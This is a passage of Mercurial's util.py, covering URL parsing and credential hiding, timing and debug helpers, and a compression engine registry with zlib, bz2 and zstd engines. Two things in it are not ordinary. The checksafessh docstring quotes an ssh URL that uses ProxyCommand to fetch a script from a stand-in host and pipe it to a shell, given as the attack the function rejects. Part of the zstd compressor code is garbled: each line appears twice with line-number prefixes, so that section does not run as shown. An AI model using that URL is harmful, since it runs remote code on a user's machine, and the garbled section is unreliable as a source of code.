        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

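# Example sketch (hypothetical values): ``authinfo()`` splits credentials
# out of a URL; the first element is safe to display, the second feeds
# urllib2's password manager.
#
# >>> url(b'http://joe:xyz@example.com/repo').authinfo()
# ('http://example.com/repo',
#  (None, ('http://example.com/repo', 'example.com'), 'joe', 'xyz'))
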
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return str(u)

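# Example sketch (hypothetical values) of the two helpers above:
#
# >>> hidepassword(b'http://joe:xyz@example.com/repo')
# 'http://joe:***@example.com/repo'
# >>> removeauth(b'http://joe:xyz@example.com/repo')
# 'http://example.com/repo'
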
timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

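# Example sketch (hypothetical sources): hooks run sorted by source name,
# and results come back in that order.
#
# >>> h = hooks()
# >>> h.add(b'zzz', lambda x: x + 1)
# >>> h.add(b'aaa', lambda x: x * 2)
# >>> h(3)
# [6, 4]
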
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
               for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
               ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)

def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write('%s at:\n' % msg.rstrip())
    for line in getstackframes(skip + 1, depth=depth):
        f.write(line)
    f.flush()

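# Example sketch (development use only, hypothetical message): print the
# five innermost frames, skipping the helper itself; the exact output
# depends on the call site.
#
# debugstacktrace(b'entering merge', skip=1, depth=5)
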
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        self._dirs = {}
        addpath = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            for f, s in map.iteritems():
                if s[0] != skip:
                    addpath(f)
        else:
            for f in map:
                addpath(f)

    def addpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if base in dirs:
                dirs[base] += 1
                return
            dirs[base] = 1

    def delpath(self, path):
        dirs = self._dirs
        for base in finddirs(path):
            if dirs[base] > 1:
                dirs[base] -= 1
                return
            del dirs[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs

def finddirs(path):
    pos = path.rfind('/')
    while pos != -1:
        yield path[:pos]
        pos = path.rfind('/', 0, pos)

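# Example sketch (hypothetical paths): ``finddirs`` yields ancestor
# directories from longest to shortest, and ``dirs`` counts them as a
# multiset (the files themselves are not members).
#
# >>> list(finddirs(b'a/b/c'))
# ['a/b', 'a']
# >>> d = dirs([b'a/b/c', b'a/d'])
# >>> (b'a' in d, b'a/b' in d, b'a/b/c' in d)
# (True, True, False)
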
# compression code

SERVERROLE = 'server'
CLIENTROLE = 'client'

compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
                                               (u'name', u'serverpriority',
                                                u'clientpriority'))

class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

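# Example sketch: looking up engines through the global manager. The
# engines referenced here are registered further below in this module.
#
# >>> compengines.forbundlename(b'gzip').name()
# 'zlib'
# >>> b'gzip' in compengines.supportedbundlenames
# True
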
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of bytes of chunks representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

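# Example sketch (hypothetical sizes) of the revlog compressor contract
# implemented above: ``compress()`` returns None whenever compression
# would not pay off.
#
# >>> c = compengines[b'zlib'].revlogcompressor()
# >>> c.compress(b'x' * 20) is None        # insize < 44 is never attempted
# True
# >>> len(c.compress(b'x' * 4096)) < 4096  # highly compressible input
# True
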
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3795
3798
3796 def compress(self, data):
3799 def compress(self, data):
3797 insize = len(data)
3800 insize = len(data)
3798 # Caller handles empty input case.
3801 # Caller handles empty input case.
3799 assert insize > 0
3802 assert insize > 0
3800
3803
3801 if insize < 50:
3804 if insize < 50:
3802 return None
3805 return None
3803
3806
3804 elif insize <= 1000000:
3807 elif insize <= 1000000:
3805 compressed = self._cctx.compress(data)
3808 compressed = self._cctx.compress(data)
3806 if len(compressed) < insize:
3809 if len(compressed) < insize:
3807 return compressed
3810 return compressed
3808 return None
3811 return None
3809 else:
3812 else:
3810 z = self._cctx.compressobj()
3813 z = self._cctx.compressobj()
3811 chunks = []
3814 chunks = []
3812 pos = 0
3815 pos = 0
3813 while pos < insize:
3816 while pos < insize:
3814 pos2 = pos + self._compinsize
3817 pos2 = pos + self._compinsize
3815 chunk = z.compress(data[pos:pos2])
3818 chunk = z.compress(data[pos:pos2])
3816 if chunk:
3819 if chunk:
3817 chunks.append(chunk)
3820 chunks.append(chunk)
3818 pos = pos2
3821 pos = pos2
3819 chunks.append(z.flush())
3822 chunks.append(z.flush())
3820
3823
3821 if sum(map(len, chunks)) < insize:
3824 if sum(map(len, chunks)) < insize:
3822 return ''.join(chunks)
3825 return ''.join(chunks)
3823 return None
3826 return None
3824
3827
3825 def decompress(self, data):
3828 def decompress(self, data):
3826 insize = len(data)
3829 insize = len(data)
3827
3830
3828 try:
3831 try:
3829 # This was measured to be faster than other streaming
3832 # This was measured to be faster than other streaming
3830 # decompressors.
3833 # decompressors.
3831 dobj = self._dctx.decompressobj()
3834 dobj = self._dctx.decompressobj()
3832 chunks = []
3835 chunks = []
3833 pos = 0
3836 pos = 0
3834 while pos < insize:
3837 while pos < insize:
3835 pos2 = pos + self._decompinsize
3838 pos2 = pos + self._decompinsize
3836 chunk = dobj.decompress(data[pos:pos2])
3839 chunk = dobj.decompress(data[pos:pos2])
3837 if chunk:
3840 if chunk:
3838 chunks.append(chunk)
3841 chunks.append(chunk)
3839 pos = pos2
3842 pos = pos2
3840 # Frame should be exhausted, so no finish() API.
3843 # Frame should be exhausted, so no finish() API.
3841
3844
3842 return ''.join(chunks)
3845 return ''.join(chunks)
3843 except Exception as e:
3846 except Exception as e:
3844 raise error.RevlogError(_('revlog decompress error: %s') %
3847 raise error.RevlogError(_('revlog decompress error: %s') %
3845 forcebytestr(e))
3848 forcebytestr(e))
3846
3849
3847 def revlogcompressor(self, opts=None):
3850 def revlogcompressor(self, opts=None):
3848 opts = opts or {}
3851 opts = opts or {}
3849 return self.zstdrevlogcompressor(self._module,
3852 return self.zstdrevlogcompressor(self._module,
3850 level=opts.get('level', 3))
3853 level=opts.get('level', 3))
3851
3854
3852 compengines.register(_zstdengine())
3855 compengines.register(_zstdengine())
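
# Illustrative sketch of the zstd behaviors above, assuming the bundled
# python-zstandard module is importable. The helper name is hypothetical
# and exists only for demonstration.
def _demozstdengine():
    engine = compengines['zstd']
    if not engine.available():
        return
    # Streaming round trip at the default level 3.
    data = b'y' * 100000
    compressed = b''.join(engine.compressstream(iter([data])))
    assert len(compressed) < len(data)
    # Revlog compressor heuristics: tiny inputs are never compressed, and
    # a result is only kept when it is actually smaller than the input.
    c = engine.revlogcompressor()
    assert c.compress(b'x' * 10) is None  # insize < 50
    out = c.compress(data)                # one-shot path (insize <= 1MB)
    assert out is not None and c.decompress(out) == data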

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
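
# Illustrative sketch: the context only needs to support the 'in' operator,
# so a plain set works for demonstration. The helper name is hypothetical.
def _demosafename():
    taken = {'f', 'f~base', 'f~base~1'}
    assert safename('f', 'base', taken) == 'f~base~2'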

def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s
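
# Illustrative sketch: readexactly() turns a short read into a hard error
# instead of silently returning fewer bytes. The helper name is hypothetical.
def _demoreadexactly():
    from io import BytesIO
    assert readexactly(BytesIO(b'abcd'), 4) == b'abcd'
    try:
        readexactly(BytesIO(b'ab'), 4)
    except error.Abort:
        pass                              # got 2 bytes, expected 4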

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)
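
# Worked example of the encoding above: 1337 is 0b10100111001. The low
# seven bits (0x39) are emitted first with the continuation bit set,
# giving 0xb9; the remaining bits (0b1010 == 0x0a) form the final byte.
# That yields '\xb9\x0a', i.e. the '\xb9\n' shown in the doctest. The
# helper name below is hypothetical.
def _demouvarintencode():
    assert uvarintencode(1337) == b'\xb9\x0a'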

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
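
# Illustrative round trip, mirroring the doctests above: every encoded
# value decodes back to itself when read from a byte stream. The helper
# name is hypothetical and exists only for demonstration.
def _demouvarintroundtrip():
    from io import BytesIO
    for value in (0, 1, 127, 128, 1337, 65536):
        assert uvarintdecodestream(BytesIO(uvarintencode(value))) == value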

###
# Deprecation warnings for util.py splitting
###

defaultdateformats = dateutil.defaultdateformats

extendeddateformats = dateutil.extendeddateformats

def makedate(*args, **kwargs):
    msg = ("'util.makedate' is deprecated, "
           "use 'utils.dateutil.makedate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.makedate(*args, **kwargs)

def datestr(*args, **kwargs):
    msg = ("'util.datestr' is deprecated, "
           "use 'utils.dateutil.datestr'")
    nouideprecwarn(msg, "4.6")
    return dateutil.datestr(*args, **kwargs)

def shortdate(*args, **kwargs):
    msg = ("'util.shortdate' is deprecated, "
           "use 'utils.dateutil.shortdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.shortdate(*args, **kwargs)

def parsetimezone(*args, **kwargs):
    msg = ("'util.parsetimezone' is deprecated, "
           "use 'utils.dateutil.parsetimezone'")
    nouideprecwarn(msg, "4.6")
    return dateutil.parsetimezone(*args, **kwargs)

def strdate(*args, **kwargs):
    msg = ("'util.strdate' is deprecated, "
           "use 'utils.dateutil.strdate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.strdate(*args, **kwargs)

def parsedate(*args, **kwargs):
    msg = ("'util.parsedate' is deprecated, "
           "use 'utils.dateutil.parsedate'")
    nouideprecwarn(msg, "4.6")
    return dateutil.parsedate(*args, **kwargs)

def matchdate(*args, **kwargs):
    msg = ("'util.matchdate' is deprecated, "
           "use 'utils.dateutil.matchdate'")
